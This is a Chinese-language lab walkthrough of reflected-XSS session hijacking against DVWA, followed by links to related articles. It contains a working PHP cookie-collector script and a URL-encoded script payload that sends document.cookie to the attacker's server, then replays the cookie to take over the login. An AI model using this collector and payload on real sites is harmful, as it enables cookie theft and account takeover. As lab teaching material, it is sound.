理解xss-劫持会话
xss-劫持会话攻击实验
Step01: 搭建好攻击者的Web服务器(LAMP或LNMP平台,phpstudy)
http://192.168.195.127/cookie.php
验证PHP环境
(1)看端口
Web:80
mysql:3306
php:9000
(2)验证PHP文件能不能正常解析
网站的根目录 c:\phpstudy_pro\www
创建一个test.php文件
<?php phpinfo() ?>
Step02:在攻击者的Web服务器的网站根目录下创建cookie.php
<?php $cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie); ?>
//把获取到的用户cookie写入到cookie.txt文件中
//网站主目录对于Web用户来说要有写入的权限
http://192.168.195.127/cookie.php
(3)验证web页面是否有xss漏洞攻击
(4)构造攻击js
//document.location 将页面内容定位到指定位置
(5)构造并发送攻击URL
http://192.168.195.129/dvwa/vulnerabilities/xss_r/?name=
(6)URL编码
http%3a%2f%2f192.168.195.129%2fdvwa%2fvulnerabilities%2fxss_r%2f%3fname%3d%3cscript%3edocument.location%3d’http%3a%2f%2f127.0.0.1%2fcookie.php%3fcookie%3d’%2bdocument.cookie%3b%3c%2fscript%3e
获得cookie
http://127.0.0.1/cookie.txt(有内容了)
劫持会话
(7)在Kali中打开登录dvwa的页面
F12更改cookie(存储位置)
192.168.195.129/dvwa/index.php
理解xss-劫持会话相关推荐
- 深入理解XSS攻击与防御
深入理解XSS攻击与防御 What is XSS XSS攻击的类型 XSS攻击原理 XSS攻击危害 XSS攻击方法 How to defense XSS 防御原则:永远不要相信用户的输入. 防御措施 ...
- 这一次,彻底理解XSS攻击
希望读完本文大家彻底理解XSS攻击,如果读完本文还不清楚,我请你吃饭慢慢告诉你~ 话不多说,我们进入正题. 一.简述 跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠 ...
- JavaWeb-WEB核心7 会话技术 理解什么是会话跟踪技术掌握Cookie的使用掌握Session的使用(钝化、活化)完善用户登录注册案例的功能
会话技术 今日目标 理解什么是会话跟踪技术 掌握Cookie的使用 掌握Session的使用 完善用户登录注册案例的功能 1,会话跟踪技术的概述 对于会话跟踪这四个词,我们需要拆开来进行解释,首先要理 ...
- 什么是http劫持?如何理解http劫持
学习网络安全方面的知识,我们常遇到一种典型的网络攻击方式:DNS劫持.也就是标题所说的http劫持.如何理解它呢?请继续往下阅 在以前,我们登陆一个网站,要输入一个网站的IP(一段较长的数字组合)而不 ...
- xss劫持 HTML 表单,XSS 之 form表单劫持(通用明文记录)
[注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!] 很多时候大家可能某一时刻特别想知道管理员的密码,就算你拿下webshell了,数据库的密码也是加密的,解开会超级麻烦, ...
- 【渗透案例】上班摸鱼误入陌生网址——结果被XSS劫持了
beef介绍 BeeF是前欧美最流行的web框架渗透测试平台,parrot和kali等渗透测试系统,都集成Beef,而且Beef有很多好使的payload. 例如,通过XSS这个简单,BeeF可以通过 ...
- 解析php.ini 中文版
php.ini对应的内容如下: ;;;;;;;;;;;; ;; 语法 ;; ;;;;;;;;;;;; ; 该文件的语法非常简单.空白字符和以分号开始的行被简单地忽略. ; 章节标题(例如: [ph ...
- 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...
- 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...
最新文章
- 【零基础】了解一下前端HTML与CSS
- 静态成员变量不占用类的内存空间
- 【原】unity shader(3)反射贴图
- 基于深度学习的磁环表面缺陷检测算法
- cad布局打印出图-01-模型空间打印
- 大地高、正高和正常高及高程异常
- matlab分析分子动力学,分子动力学程序框架
- Qt 局域网聊天工具
- (转)最大流最小割定理
- python数据可视化常用工具推荐
- 就业形势严峻,应届生应该如何做好职业规划?
- 比较线程子进程 占用的内存情况
- 数据仓库系列:初识数仓
- 关于sp和unity近似的PBR的一篇国外文章
- 如何使用HTML制作tab选项卡
- 计算机毕业设计android的云南旅游,美食攻略,产品预订app(源码+系统+mysql数据库+Lw文档)
- 广域网 (PPP协议 HDLC协议)、链路层设备
- 区块链在司法存证领域的应用报告 | 陀螺研究院
- maya 2019 mac版
- Android 开发之 ContentProvider 内容提供者